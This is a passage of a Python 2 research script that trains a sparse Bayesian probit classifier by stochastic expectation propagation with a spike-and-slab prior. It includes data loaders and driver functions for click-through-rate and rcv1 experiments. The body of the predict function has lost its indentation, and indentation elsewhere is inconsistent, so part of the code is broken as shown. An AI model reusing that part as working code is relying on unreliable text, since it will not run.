					xbatch = np.array(val)
					xbatch2 = xbatch**2
					ybatch = int(items[0])
					if ybatch == 1:
						#cavity dist. q^{-1}, the same for each batch-sample
						v_inv_not = 1.0/self.v[id] - 1.0/self.v_l_pos[id]
						v_not = 1.0/v_inv_not
						mu_not = v_not * (self.mu[id]/self.v[id] - self.mu_l_pos[id]/self.v_l_pos[id])
						# probit tilted moments for this sample
						t1 = ybatch * np.sum(mu_not * xbatch)
						t2 = np.sqrt(np.sum(v_not*xbatch2 + 1.0))
						t3 = self.pdf_over_cdf(t1/t2)/t2
						dmu_not = (t3*ybatch) * xbatch
						dv_not = (-0.5*t3*t1/(t2*t2)) * xbatch2
						mu = mu_not + v_not * dmu_not
						v = v_not - v_not**2*(dmu_not**2 - 2*dv_not)
						#obtain new batch likelihood approx.
						v_l_inv = 1/v - 1/v_not
						v_l_inv[ v_l_inv <= 0] = 1/self.INF
						v_l_inv_mu = mu/v - mu_not/v_not
						if damping_both:
							v_l_inv = self.damping * v_l_inv + (1.0 - self.damping) * 1.0/self.v_l_pos[id]
							v_l_inv_mu = self.damping * v_l_inv_mu + (1.0 - self.damping) * self.mu_l_pos[id]/self.v_l_pos[id]
						n_batch_pos[id] += 1.0
						v_l_inv_batch_pos[id] += v_l_inv
						v_l_inv_mu_batch_pos[id] += v_l_inv_mu
					else:
						#cavity dist. q^{-1}, the same for each batch-sample
						v_inv_not = 1.0/self.v[id] - 1.0/self.v_l_neg[id]
						v_not = 1.0/v_inv_not
						mu_not = v_not * (self.mu[id]/self.v[id] - self.mu_l_neg[id]/self.v_l_neg[id])
						t1 = ybatch * np.sum(mu_not * xbatch)
						t2 = np.sqrt(np.sum(v_not*xbatch2 + 1.0))
						t3 = self.pdf_over_cdf(t1/t2)/t2
						dmu_not = (t3*ybatch) * xbatch
						dv_not = (-0.5*t3*t1/(t2*t2)) * xbatch2
						mu = mu_not + v_not * dmu_not
						v = v_not - v_not**2*(dmu_not**2 - 2*dv_not)
						#obtain new batch likelihood approx.
						v_l_inv = 1/v - 1/v_not
						v_l_inv[ v_l_inv <= 0] = 1/self.INF
						v_l_inv_mu = mu/v - mu_not/v_not
						if damping_both:
							v_l_inv = self.damping * v_l_inv + (1.0 - self.damping) * 1.0/self.v_l_neg[id]
							v_l_inv_mu = self.damping * v_l_inv_mu + (1.0 - self.damping) * self.mu_l_neg[id]/self.v_l_neg[id]
						n_batch_neg[id] += 1.0
						v_l_inv_batch_neg[id] += v_l_inv
						v_l_inv_mu_batch_neg[id] += v_l_inv_mu
					curr = curr + 1
					#print 'batch %d'%curr
					if count == self.mini_batch:
						#stochastic update: blend the batch statistics into the
						#running average-likelihood factors, weighted per feature
						ind = np.nonzero(n_batch_pos)
						if ind[0].size>0:
							v_l_inv_pos = ((n_pos[ind] - n_batch_pos[ind]) * (1.0/self.v_l_pos[ind]) + v_l_inv_batch_pos[ind])/n_pos[ind]
							v_l_inv_mu_pos = ((n_pos[ind] - n_batch_pos[ind]) * (self.mu_l_pos[ind]/self.v_l_pos[ind]) + v_l_inv_mu_batch_pos[ind])/n_pos[ind]
							self.v_l_pos[ind] = 1.0/v_l_inv_pos
							self.mu_l_pos[ind] = self.v_l_pos[ind]*v_l_inv_mu_pos
							accumulate_ind = list(set().union(accumulate_ind, list(ind[0])))
						ind = np.nonzero(n_batch_neg)
						if ind[0].size>0:
							v_l_inv_neg = ((n_neg[ind] - n_batch_neg[ind]) * (1.0/self.v_l_neg[ind]) + v_l_inv_batch_neg[ind])/n_neg[ind]
							v_l_inv_mu_neg= ((n_neg[ind] - n_batch_neg[ind]) * (self.mu_l_neg[ind]/self.v_l_neg[ind]) + v_l_inv_mu_batch_neg[ind])/n_neg[ind]
							self.v_l_neg[ind] = 1.0/v_l_inv_neg
							self.mu_l_neg[ind] = self.v_l_neg[ind]*v_l_inv_mu_neg
							accumulate_ind = list(set().union(accumulate_ind, list(ind[0])))
						# rebuild the global posterior from all factors
						v_inv_all = 1.0/self.v_p + n_pos*(1.0/self.v_l_pos) + n_neg*(1.0/self.v_l_neg)
						v_inv_mu = self.mu_p/self.v_p + n_pos*(self.mu_l_pos/self.v_l_pos) + n_neg*(self.mu_l_neg/self.v_l_neg)
						self.v = 1.0/v_inv_all
						self.mu = self.v*v_inv_mu
						#clear
						count = 0
						n_batch_pos = np.zeros(d)
						n_batch_neg = np.zeros(d)
						v_l_inv_batch_pos = np.zeros(d)
						v_l_inv_batch_neg = np.zeros(d)
						v_l_inv_mu_batch_pos = np.zeros(d)
						v_l_inv_mu_batch_neg = np.zeros(d)
						#we control how often we update the prior factors
						if (curr/self.mini_batch) % n_batch_update_prior == 0:
							#update prior factors (only for features touched since
							#the last prior update, tracked in accumulate_ind)
							v_inv_not = 1/self.v[accumulate_ind] - 1/self.v_p[accumulate_ind]
							v_not = 1/v_inv_not
							mu_not = v_not * (self.mu[accumulate_ind]/self.v[accumulate_ind] - self.mu_p[accumulate_ind]/self.v_p[accumulate_ind])
							v_tilt = 1/(1/v_not + 1/self.tau0)
							mu_tilt = v_tilt * (mu_not/v_not)
							#log N(0 | mu_not, v_not + tau0)
							log_h = normal.logpdf(mu_not, scale = np.sqrt(v_not + self.tau0))
							#log N(0 | mu_not, v_not)
							log_g = normal.logpdf(mu_not, scale = np.sqrt(v_not))
							rho_p = log_h - log_g
							sel_prob = expit(self.rho + rho_p)
							mu = sel_prob * mu_tilt
							v = sel_prob * (v_tilt + (1.0 - sel_prob)*mu_tilt**2)
							#damping
							self.rho_p[accumulate_ind] = self.damping * rho_p + (1 - self.damping) * self.rho_p[accumulate_ind]
							v_p_inv = 1/v - v_inv_not
							v_p_inv[ v_p_inv <= 0] = 1/self.INF
							v_p_inv_mu = mu/v - mu_not/v_not
							v_p_inv = self.damping * v_p_inv + (1 - self.damping) * 1/self.v_p[accumulate_ind]
							v_p_inv_mu = self.damping * v_p_inv_mu + (1 - self.damping) * self.mu_p[accumulate_ind]/self.v_p[accumulate_ind]
							self.v_p[accumulate_ind] = 1/v_p_inv
							self.mu_p[accumulate_ind] = self.v_p[accumulate_ind] * v_p_inv_mu
							#update global approx. dist.
							self.r[accumulate_ind] = self.rho_p[accumulate_ind] + self.rho
							v_inv_all = v_inv_not + 1.0/self.v_p[accumulate_ind]
							v_inv_mu = mu_not/v_not + self.mu_p[accumulate_ind]/self.v_p[accumulate_ind]
							self.v[accumulate_ind] = 1.0/v_inv_all
							self.mu[accumulate_ind] = self.v[accumulate_ind] * v_inv_mu
							accumulate_ind = []
						# periodic convergence diagnostics
						if (curr/self.mini_batch)%10 == 0:
							diff = np.sum(np.abs((1/old_v - 1/self.v)) + np.sum(np.abs(old_mu - self.mu)) + np.sum(np.abs(old_r - self.r)))/(old_v.size + old_mu.size + old_r.size)
							print >>logger, 'epoch %d, %d batches, diff = %g'%(it, curr/self.mini_batch, diff)
							logger.flush()
							print 'epoch %d, %d batches, diff = %g'%(it, curr/self.mini_batch, diff)
							if diff < self.tol:
								break
							old_v = self.v.copy()
							old_mu = self.mu.copy()
							old_r = self.r.copy()
						# periodic held-out AUC and timing
						if (curr/self.mini_batch)%1000==0:
							pred = self.predict(Xtest)
							fpr,tpr,th = metrics.roc_curve(ytest, pred, pos_label=1)
							val = metrics.auc(fpr,tpr)
							print >>logger, 'auc = %g, feature # = %d'%(val, np.sum(self.r>0))
							print 'auc = %g, feature # = %d'%(val, np.sum(self.r>0))
							elapse = time.clock() - start_time
							start_time = time.clock()
							print '1000 batches, take %g seconds'%elapse
			#evaluation at the end of each epoch
			pred = self.predict(Xtest)
			fpr,tpr,th = metrics.roc_curve(ytest, pred, pos_label=1)
			val = metrics.auc(fpr,tpr)
			print >>logger, 'epoch %d, tau0 = %g, auc = %g, feature # = %d'%(it, self.tau0, val, np.sum(self.r>0))
			print 'epoch %d, tau0 = %g, auc = %g, feature # = %d'%(it, self.tau0, val, np.sum(self.r>0))
			it = it + 1
			curr = 0
def predict(self, Xtest):
d = self.mu.size
if d == Xtest.shape[1] + 1:
Xtest = np.hstack([Xtest, np.ones(Xtest.shape[0]).reshape([Xtest.shape[0],1])])
elif d != Xtest.shape[1]:
print 'inconsistent feature number'
return
#pred_prob = normal.cdf( np.dot(Xtest,self.mu) / np.sqrt( np.dot(Xtest**2, self.v) + 1 ) )
#pred_prob = np.dot(Xtest,self.mu)
#mu = self.mu * (expit(self.r)>0.5)
mu = self.mu * (expit(self.r)>0.5)
v = self.v * (expit(self.r)>0.5)
pred_prob = Xtest.dot(mu)
#pred_prob = np.dot(Xtest, mu)
#pred_prob = normal.cdf( np.dot(Xtest, mu) / np.sqrt( np.dot(Xtest**2, v) + 1 ) )
return pred_prob
#this version keeps average likelihood for pos. and neg. samples separately, and also use n_pos and n_neg to update the full posterior
#enforce the same step-size
#this reads data from HDFS and keeps read the negative samples until it reaches the same amount with the postive samples
#then pass once
#in theory, go 1000 pass can process all 7 days' data, 150 iteraions can process 1day's data
	def train_stochastic_v6(self, X, y, n_pos, n_neg, Xtest, ytest, logger, n_batch_update_prior = 1, intercept = False, damping_both = True):
		"""SEP training variant: keeps separate average-likelihood factors for
		positive and negative samples and rebuilds the posterior with the
		counts n_pos/n_neg, using one shared (uniform) step size.

		Streams '/tmp/ctr-train-36m.csv', filling X with negative samples
		until it has read n_pos of them, then runs one shuffled online pass
		over the n rows, with periodic prior-factor updates and per-epoch
		held-out AUC evaluation.
		NOTE(review): Python 2 code (print statements, list-returning range);
		the hard-coded data path and the unused `data` variable are presumably
		experiment-specific leftovers.
		"""
		if intercept:
			X = np.hstack([X, np.ones(X.shape[0]).reshape([X.shape[0],1])])
		self.init_sep(X,y)
		n,d = X.shape
		#separate average likelihood for pos. & neg. samples
		self.INF = 1e7
		self.mu_p = np.zeros(d)
		self.v_p = self.INF*np.ones(d)
		self.mu_l_pos = np.zeros(d)
		self.v_l_pos = self.INF * np.ones(d)
		self.mu_l_neg = np.zeros(d)
		self.v_l_neg = self.INF * np.ones(d)
		self.v = 1.0/(1.0/self.v_p + n_pos*1.0/self.v_l_pos + n_neg*1.0/self.v_l_neg)
		self.mu = np.zeros(d)
		#calc. an uniform step-size
		step_size = 10*float(self.mini_batch)/(n_pos + n_neg)
		old_v = self.v.copy()
		old_mu = self.mu.copy()
		old_r = self.r.copy()
		rows_shuf = range(n)
		it = 0
		count = 0
		#for line in stdin:
		#f = open('/tmp/ctr-train-4m','r')
		with open('/tmp/ctr-train-36m.csv','r') as f:
			for line in f:
				#First read the same amount of negative samples
				terms = line.strip().split(',')
				if terms[-1] == "-1":
					X[n_pos+count,:] = np.array([float(term) for term in terms[:-1]] + [1.0]) #adding intercept
					count = count + 1
					print count, n_pos
					if count == n_pos:
						data = np.hstack([X[:,:-1] , y.reshape(X.shape[0],1)])
						#go though and online update
						count = 0
						curr = 0
						np.random.shuffle( rows_shuf )
						while curr < n:
							#update average likelihood factor -- update batch samples
							#ind = np.random.choice(n, self.mini_batch, replace=False)
							ind = rows_shuf[curr:curr+self.mini_batch]
							xbatch = X[ind,:]
							xbatch2 = xbatch**2
							ybatch = y[ind]
							bsz = len(ind)
							print np.sum(ybatch>0), np.sum(ybatch<0)
							#cavity dist. q^{-1}, the same for each sample type
							v_inv_not = np.zeros([bsz, d])
							mu_inv_v_not = np.zeros([bsz, d])
							v_inv_not[ybatch>0,:] = 1.0/self.v - 1.0/self.v_l_pos
							v_inv_not[ybatch<0,:] = 1.0/self.v - 1.0/self.v_l_neg
							mu_inv_v_not[ybatch>0,:] = self.mu/self.v - self.mu_l_pos/self.v_l_pos
							mu_inv_v_not[ybatch<0,:] = self.mu/self.v - self.mu_l_neg/self.v_l_neg
							v_not = 1.0/v_inv_not
							mu_not = v_not * mu_inv_v_not
							'''
							v_inv_not = 1.0/self.v - 1.0/self.v_l
							v_not = 1.0/v_inv_not
							mu_not = v_not * (self.mu/self.v - self.mu_l/self.v_l)
							mu_not = np.tile(mu_not, [len(ind), 1])
							v_not = np.tile(v_not, [len(ind), 1])
							'''
							# probit moment matching for the whole mini-batch
							t1 = ybatch * np.sum(mu_not * xbatch, 1)
							t2 = np.sqrt(np.sum(v_not*xbatch2 + 1.0, 1))
							t3 = self.pdf_over_cdf(t1/t2)/t2
							dmu_not = np.tile(vec(t3*ybatch), [1, d]) * xbatch
							dv_not = np.tile(vec(-0.5*t3*t1/(t2*t2)), [1,d]) * xbatch2
							mu = mu_not + v_not * dmu_not
							v = v_not - v_not**2*(dmu_not**2 - 2*dv_not)
							#obtain new batch likelihood approx.
							v_l_inv = 1/v - 1/v_not
							v_l_inv[ v_l_inv <= 0] = 1/self.INF
							v_l_inv_mu = mu/v - mu_not/v_not
							if damping_both:
								prev = np.zeros([bsz, d])
								prev[ybatch>0,:] = 1.0/self.v_l_pos
								prev[ybatch<0,:] = 1.0/self.v_l_neg
								v_l_inv = self.damping * v_l_inv + (1.0 - self.damping) * prev
								prev[ybatch>0,:] = self.mu_l_pos/self.v_l_pos
								prev[ybatch<0,:] = self.mu_l_neg/self.v_l_neg
								v_l_inv_mu = self.damping * v_l_inv_mu + (1.0 - self.damping) * prev
							# blend batch means into the running factors with the uniform step size
							v_l_inv_pos = step_size * np.mean(v_l_inv[ybatch>0,:], 0) + (1.0 - step_size) * 1.0/self.v_l_pos
							v_l_inv_mu_pos = step_size * np.mean(v_l_inv_mu[ybatch>0,:],0) + (1.0 - step_size) * self.mu_l_pos/self.v_l_pos
							self.v_l_pos = 1.0/v_l_inv_pos
							self.mu_l_pos = self.v_l_pos * v_l_inv_mu_pos
							v_l_inv_neg = step_size * np.mean(v_l_inv[ybatch<0,:], 0) + (1.0 - step_size) * 1.0/self.v_l_neg
							v_l_inv_mu_neg = step_size * np.mean(v_l_inv_mu[ybatch<0,:],0) + (1.0 - step_size) * self.mu_l_neg/self.v_l_neg
							self.v_l_neg = 1.0/v_l_inv_neg
							self.mu_l_neg = self.v_l_neg * v_l_inv_mu_neg
							# rebuild the global posterior from all factors
							v_inv_all = 1.0/self.v_p + n_pos*v_l_inv_pos + n_neg*v_l_inv_neg
							self.v = 1.0/v_inv_all
							self.mu = self.v*(self.mu_p/self.v_p + n_pos*v_l_inv_mu_pos + n_neg*v_l_inv_mu_neg)
							curr = curr + self.mini_batch
							#we control how often we update the prior factors
							if (curr/self.mini_batch) % n_batch_update_prior == 0:
								#update prior factors
								v_inv_not = 1/self.v - 1/self.v_p
								v_not = 1/v_inv_not
								mu_not = v_not * (self.mu/self.v - self.mu_p/self.v_p)
								v_tilt = 1/(1/v_not + 1/self.tau0)
								mu_tilt = v_tilt * (mu_not/v_not)
								#log N(0 | mu_not, v_not + tau0)
								log_h = normal.logpdf(mu_not, scale = np.sqrt(v_not + self.tau0))
								#log N(0 | mu_not, v_not)
								log_g = normal.logpdf(mu_not, scale = np.sqrt(v_not))
								rho_p = log_h - log_g
								sel_prob = expit(self.rho + rho_p)
								mu = sel_prob * mu_tilt
								v = sel_prob * (v_tilt + (1.0 - sel_prob)*mu_tilt**2)
								#damping
								self.rho_p = self.damping * rho_p + (1 - self.damping) * self.rho_p
								v_p_inv = 1/v - v_inv_not
								v_p_inv[ v_p_inv <= 0] = 1/self.INF
								v_p_inv_mu = mu/v - mu_not/v_not
								v_p_inv = self.damping * v_p_inv + (1 - self.damping) * 1/self.v_p
								v_p_inv_mu = self.damping * v_p_inv_mu + (1 - self.damping) * self.mu_p/self.v_p
								self.v_p = 1/v_p_inv
								self.mu_p = self.v_p * v_p_inv_mu
								#update global approx. dist.
								self.r = self.rho_p + self.rho
								v_inv_all = v_inv_not + 1.0/self.v_p
								v_inv_mu = mu_not/v_not + self.mu_p/self.v_p
								self.v = 1.0/v_inv_all
								self.mu = self.v * v_inv_mu
							# periodic convergence diagnostics
							if (curr/self.mini_batch)%3 == 0:
								diff = (np.sum(np.abs(1/old_v - 1/self.v)) + np.sum(np.abs(old_mu - self.mu)) + np.sum(np.abs(old_r - self.r)))/(old_v.size + old_mu.size + old_r.size)
								print 'epoch %d, %d batches, diff = %g'%(it, curr/self.mini_batch, diff)
								print >>logger, 'epoch %d, %d batches, diff = %g'%(it, curr/self.mini_batch, diff)
								if diff < self.tol:
									break
								old_v = self.v.copy()
								old_mu = self.mu.copy()
								old_r = self.r.copy()
						#evaluation at the end of each epoch
						pred = self.predict(Xtest)
						fpr,tpr,th = metrics.roc_curve(ytest, pred, pos_label=1)
						val = metrics.auc(fpr,tpr)
						print 'epoch %d, auc = %g, feature # = %d'%(it, val, np.sum(self.r>0))
						print >>logger, 'epoch %d, auc = %g, feature # = %d'%(it, val, np.sum(self.r>0))
						it = it + 1
						if it >= self.n_epoch:
							break
#SEP training
def train_stochastic(self, X, y, intercept = False):
    """Stochastic Expectation Propagation (SEP) training loop.

    X: (n, d) design matrix; y: labels, used multiplicatively in the probit
    moment computation (presumably encoded as +/-1 -- TODO confirm against
    the data loaders). intercept: when True an all-ones column is appended.

    Updates in place: self.mu/self.v (global Gaussian approximation),
    self.mu_l/self.v_l (average likelihood factor), self.mu_p/self.v_p and
    self.rho_p/self.r (spike-and-slab prior factor / selection logits).
    Python 2 module (print statements below).
    """
    if intercept:
        X = np.hstack([X, np.ones(X.shape[0]).reshape([X.shape[0],1])])
    self.init_sep(X,y)
    n,d = X.shape
    # Snapshots used to measure parameter movement for the stopping rule.
    old_v = self.v.copy()
    old_mu = self.mu.copy()
    old_r = self.r.copy()
    # Python 2: range() returns a list, which shuffle() permutes in place.
    # (Shuffled order is currently unused; sampling is done with np.random.choice.)
    rows_shuf = range(n)
    np.random.shuffle( rows_shuf )
    it = 0       # epoch counter
    curr = 0     # samples consumed in the current epoch
    while it < self.n_epoch:
        #update average likelihood factor -- update batch samples
        ind = np.random.choice(n, self.mini_batch, replace=False)
        #ind = rows_shuf[curr:curr+self.mini_batch]
        xbatch = X[ind,:]
        xbatch2 = xbatch**2
        ybatch = y[ind]
        #cavity dist. q^{-1}, the same for each batch-sample
        v_inv_not = 1.0/self.v - 1.0/self.v_l
        v_not = 1.0/v_inv_not
        mu_not = v_not * (self.mu/self.v - self.mu_l/self.v_l)
        mu_not = np.tile(mu_not, [self.mini_batch, 1])
        v_not = np.tile(v_not, [self.mini_batch, 1])
        # Probit moment matching: t3 is N(z)/Phi(z) scaled by the predictive
        # std; dmu_not/dv_not are the derivatives used for the new moments.
        t1 = ybatch * np.sum(mu_not * xbatch, 1)
        t2 = np.sqrt(np.sum(v_not*xbatch2 + 1.0, 1))
        t3 = self.pdf_over_cdf(t1/t2)/t2
        dmu_not = np.tile(vec(t3*ybatch), [1, d]) * xbatch
        dv_not = np.tile(vec(-0.5*t3*t1/(t2*t2)), [1,d]) * xbatch2
        mu = mu_not + v_not * dmu_not
        v = v_not - v_not**2*(dmu_not**2 - 2*dv_not)
        #obtain new batch likelihood approx.
        v_l_inv = 1/v - 1/v_not
        v_l_inv[ v_l_inv <= 0] = 1/self.INF    # clip non-positive precisions
        v_l = 1.0/v_l_inv
        v_l_inv = self.damping * 1.0/v_l + (1 - self.damping) * np.tile(1.0/self.v_l, [self.mini_batch, 1])
        v_l_inv_mu = self.damping * (mu/v - mu_not/v_not) + (1 - self.damping) * np.tile(self.mu_l/self.v_l, [self.mini_batch, 1])
        #stoastic update
        v_inv_all = 1/self.v_p + (n - self.mini_batch) * 1.0/self.v_l + np.sum(v_l_inv, 0)
        v_inv_mu = self.mu_p/self.v_p + (n - self.mini_batch) * self.mu_l/self.v_l + np.sum(v_l_inv_mu, 0)
        self.v = 1/v_inv_all
        self.mu = self.v * v_inv_mu
        self.v_l = 1.0/((v_inv_all - 1/self.v_p)/n)
        self.mu_l = self.v_l * ( (v_inv_mu - self.mu_p/self.v_p)/n )
        #update prior factors
        v_inv_not = 1/self.v - 1/self.v_p
        v_not = 1/v_inv_not
        mu_not = v_not * (self.mu/self.v - self.mu_p/self.v_p)
        # Tilted moments of the cavity times the slab N(0, tau0).
        v_tilt = 1/(1/v_not + 1/self.tau0)
        mu_tilt = v_tilt * (mu_not/v_not)
        #log N(0 | mu_not, v_not + tau0)
        log_h = normal.logpdf(mu_not, scale = np.sqrt(v_not + self.tau0))
        #log N(0 | mu_not, v_not)
        log_g = normal.logpdf(mu_not, scale = np.sqrt(v_not))
        rho_p = log_h - log_g
        sel_prob = expit(self.rho + rho_p)    # per-feature inclusion probability
        mu = sel_prob * mu_tilt
        v = sel_prob * (v_tilt + (1.0 - sel_prob)*mu_tilt**2)
        #damping
        self.rho_p = self.damping * rho_p + (1 - self.damping) * self.rho_p
        v_p_inv = 1/v - v_inv_not
        v_p_inv[ v_p_inv <= 0] = 1/self.INF
        v_p_inv_mu = mu/v - mu_not/v_not
        v_p_inv = self.damping * v_p_inv + (1 - self.damping) * 1/self.v_p
        v_p_inv_mu = self.damping * v_p_inv_mu + (1 - self.damping) * self.mu_p/self.v_p
        self.v_p = 1/v_p_inv
        self.mu_p = self.v_p * v_p_inv_mu
        #update global approx. dist.
        self.r = self.rho_p + self.rho
        v_inv_all = v_inv_not + 1.0/self.v_p
        v_inv_mu = mu_not/v_not + self.mu_p/self.v_p
        self.v = 1.0/v_inv_all
        self.mu = self.v * v_inv_mu
        curr = curr + self.mini_batch
        if curr%10 == 0:
            # RMS parameter movement since the last check, averaged per entry.
            diff = np.sqrt(np.sum((1/old_v - 1/self.v)**2) + np.sum((old_mu - self.mu)**2) + np.sum((old_r - self.r)**2))/(old_v.size + old_mu.size + old_r.size)
            print 'epoch %d, %d batches, diff = %g'%(it, curr/self.mini_batch, diff)
            if diff < self.tol:
                break
            old_v = self.v.copy()
            old_mu = self.mu.copy()
            old_r = self.r.copy()
        if curr >= n:
            it = it + 1
            curr = 0
def test_ctr_large_sep_weighted():
    """Driver: train the weighted SEP variant (train_stochastic_v4) on the
    large CTR data set and save the learned weights / selection logits.

    Relies on pre-built artifacts on disk: the cached test matrix/labels,
    feature id and stats files, and the per-class feature counts.
    """
    training_file = '/tmp/large-ctr-pxu-train'
    testing_file = '/tmp/large-ctr-pxu-test'
    fea2id = load_feature_id('feature_to_id.txt')
    fea2stats = load_feature_stats('mean_std_continuous_features.txt')
    # One-time preprocessing, kept disabled (string literal acts as a comment):
    '''
    Xtest,ytest = load_test_data('/tmp/large-ctr-pxu-test', fea2id, fea2stats)
    save_sparse_csr('/tmp/large-ctr-pxu-test-X', Xtest)
    np.save('/tmp/large-ctr-pxu-test-y', ytest)
    sys.exit(1)
    '''
    Xtest = load_sparse_csr('/tmp/large-ctr-pxu-test-X.npz')
    ytest = np.load('/tmp/large-ctr-pxu-test-y.npy')
    d = 204327    # feature dimension of this data set (hard-coded)
    #calc_feature_appearence_separately(d, fea2id, training_file)
    n_pos = np.load('feature_appearence_pos.npy')
    n_neg = np.load('feature_appearence_neg.npy')
    ep = EPSS(d, rho0 = 0.0000001, n_epoch = 1, mini_batch = 100, tol = 1e-5, damping = 0.9, tau0 = 1.0)
    with open('logger-2.txt','w') as f:
        ep.train_stochastic_v4(d, n_pos, n_neg, training_file, fea2id, fea2stats, Xtest, ytest, f, n_batch_update_prior = 1, damping_both = True)
    # Final model: posterior mean masked by the selection probabilities.
    w = ep.mu * (expit(ep.r)>0.5)
    np.save('model-w-8.npy', w)
    r = ep.r
    np.save('sel-w-8.npy', r)
def test_ctr_large_sep():
    """Driver: train the unweighted SEP variant (train_stochastic_v3) on the
    large CTR data set and save the learned weights / selection logits.
    Mirrors test_ctr_large_sep_weighted but without the per-class counts.
    """
    training_file = '/tmp/large-ctr-pxu-train'
    testing_file = '/tmp/large-ctr-pxu-test'
    fea2id = load_feature_id('feature_to_id.txt')
    fea2stats = load_feature_stats('mean_std_continuous_features.txt')
    # One-time preprocessing, kept disabled (string literal acts as a comment):
    '''
    Xtest,ytest = load_test_data('/tmp/large-ctr-pxu-test', fea2id, fea2stats)
    save_sparse_csr('/tmp/large-ctr-pxu-test-X', Xtest)
    np.save('/tmp/large-ctr-pxu-test-y', ytest)
    sys.exit(1)
    '''
    Xtest = load_sparse_csr('/tmp/large-ctr-pxu-test-X.npz')
    ytest = np.load('/tmp/large-ctr-pxu-test-y.npy')
    d = 204327    # feature dimension of this data set (hard-coded)
    ep = EPSS(d, rho0 = 0.5, n_epoch = 10, mini_batch = 100, tol = 1e-5, damping = 0.9, tau0 = 1.0)
    with open('logger.txt','w') as f:
        ep.train_stochastic_v3(d, training_file, fea2id, fea2stats, Xtest, ytest, f, n_batch_update_prior = 1, damping_both = True)
    # Final model: posterior mean masked by the selection probabilities.
    w = ep.mu * (expit(ep.r)>0.5)
    np.save('model-2.npy', w)
    r = ep.r
    np.save('sel-2.npy', r)
def load_feature_id(file_path):
    """Load a tab-separated ``name<TAB>id`` file into a dict.

    :param file_path: path to a text file with one ``name\\tid`` pair per line.
    :return: dict mapping feature name (str) -> feature id (int).
    :raises ValueError: if a line does not have exactly two tab-separated fields.
    """
    res = {}
    with open(file_path, 'r') as f:
        for line in f:
            # Renamed from ``id`` to avoid shadowing the ``id()`` builtin.
            name, feat_id = line.strip().split('\t')
            res[name] = int(feat_id)
    return res
def load_feature_stats(file_path):
    """Load per-feature (mean, std) rows from a tab-separated file.

    Deliberately returns ``[0.0, 1.0]`` for every feature: the original author
    disabled normalization this way ("very hacking way -- zsd"), so the parsed
    mean/std values are discarded on purpose.
    """
    stats = {}
    with open(file_path, 'r') as fh:
        for row in fh:
            feature_name, mean, std = row.strip().split('\t')
            # Identity normalization (mean 0, std 1) instead of the real
            # [float(mean), float(std)] -- keeps downstream scaling a no-op.
            stats[feature_name] = [0.0, 1.0]
    return stats
def load_test_data(file_path, fea2id, fea2stats):
    """Parse a VW-style test file into a CSR matrix plus a label vector.

    Each line looks like ``label <skipped> name[:value] name[:value] ...``
    (items[1] is skipped -- presumably an importance/tag field, TODO confirm).
    Unknown feature names are dropped; a constant intercept column is appended
    at index len(fea2id). fea2stats is accepted but currently unused here.
    Returns [Xtest, y]. Python 2 module (print statement below).
    """
    y = []
    row_ind = []
    col_ind = []
    data = []
    row_num = 0
    with open(file_path, 'r') as f:
        for line in f:
            items = line.strip().split(' ')
            y.append(int(items[0]))
            for item in items[2:]:
                key_val = item.split(':')
                if key_val[0] not in fea2id:
                    continue    # feature not in the training vocabulary
                id = fea2id[ key_val[0] ]
                if len(key_val) == 1:
                    data.append(1.0)    # bare feature name counts as 1.0
                else:
                    data.append(float(key_val[1]))
                    #data.append( normalize(float(key_val[1]), fea2stats[key_val[0]]) )
                row_ind.append(row_num)
                col_ind.append(id)
            #append intercept
            data.append(1.0)
            row_ind.append(row_num)
            col_ind.append(len(fea2id))
            row_num = row_num + 1
            if row_num%10000 == 0:
                print row_num
    Xtest = csr_matrix((data, (row_ind, col_ind)))
    y = np.array(y)
    return [Xtest,y]
def save_sparse_csr(filename, array):
    """Persist a scipy CSR matrix to an .npz archive (data/indices/indptr/shape).

    np.savez appends '.npz' to ``filename`` when it lacks that extension;
    the counterpart loader is load_sparse_csr.
    """
    np.savez(filename,
             data=array.data,
             indices=array.indices,
             indptr=array.indptr,
             shape=array.shape)
def load_sparse_csr(filename):
    """Rebuild a scipy CSR matrix from an .npz archive written by save_sparse_csr.

    ``filename`` must include the '.npz' extension that np.savez added.
    """
    archive = np.load(filename)
    return csr_matrix(
        (archive['data'], archive['indices'], archive['indptr']),
        shape=archive['shape'])
#calculate the appearche of each features in the training data, for postive and negative samples
def calc_feature_appearence_separately(d, fea2id, training_file):
    """Count, per feature id, how often it appears in positive vs negative
    samples of ``training_file``; results (length d+1, last slot = intercept)
    are written to feature_appearence_pos.npy / feature_appearence_neg.npy.
    Python 2 module (print statement below).
    """
    #including intercept
    #pos
    res = np.zeros(d+1)
    #neg
    res2 = np.zeros(d+1)
    with open(training_file, 'r') as f:
        ct = 0
        for line in f:
            ct = ct + 1
            items = line.strip().split(' ')
            label = int(items[0])
            # Slot d counts the implicit intercept once per sample.
            if label == 1:
                res[d] = res[d] + 1
            else:
                res2[d] = res2[d] + 1
            # NOTE(review): features start at items[3:] here, while
            # load_test_data reads items[2:]; confirm the intended offset
            # for the training-file format.
            for item in items[3:]:
                name = item.split(':')[0]
                id = fea2id[name]
                if label == 1:
                    res[ id ] = res[ id ] + 1
                else:
                    res2[ id ] = res2[ id ] + 1
            if ct%10000 == 0:
                print ct
    np.save('feature_appearence_pos.npy',res)
    np.save('feature_appearence_neg.npy',res2)
def tune_rcv1(tau0):
    """Validation run on an rcv1 subset for one slab-variance value ``tau0``;
    appends evaluation output to logger-rcv1-tune.txt. Expects the cached
    validation matrix/labels and the feature-count .npy files on disk.
    """
    training_file = '../../../data/rcv1/rcv1.train.vw.subtrain'
    testing_file = '../../../data/rcv1/rcv1.train.vw.validation'
    fea2id = load_feature_id('feature_to_id.txt')
    #zsd, note i used a very hacking way to disable the normalization effect
    fea2stats = load_feature_stats('mean_std_continuous_features.txt')
    # One-time preprocessing, kept disabled (string literal acts as a comment):
    '''
    Xtest,ytest = load_test_data(testing_file, fea2id, fea2stats)
    save_sparse_csr('./rcv1.validate-X', Xtest)
    np.save('./rcv1.validate-y', ytest)
    sys.exit(1)
    '''
    Xtest = load_sparse_csr('./rcv1.validate-X.npz')
    ytest = np.load('./rcv1.validate-y.npy')
    d = len(fea2id)
    #calc_feature_appearence_separately(d, fea2id, training_file)
    n_pos = np.load('feature_appearence_pos.npy')
    n_neg = np.load('feature_appearence_neg.npy')
    ep = EPSS(d, rho0 = 0.5, n_epoch = 1, mini_batch = 100, tol = 1e-5, damping = 0.9, tau0 = tau0)
    with open('logger-rcv1-tune.txt','a+') as f:
        ep.train_stochastic_multi_rate(d, n_pos, n_neg, training_file, fea2id, fea2stats, Xtest, ytest, f, n_batch_update_prior = 1, damping_both = True)
if __name__ == '__main__':
    # Command line: <script> <tau0>. Python 2 print statement below.
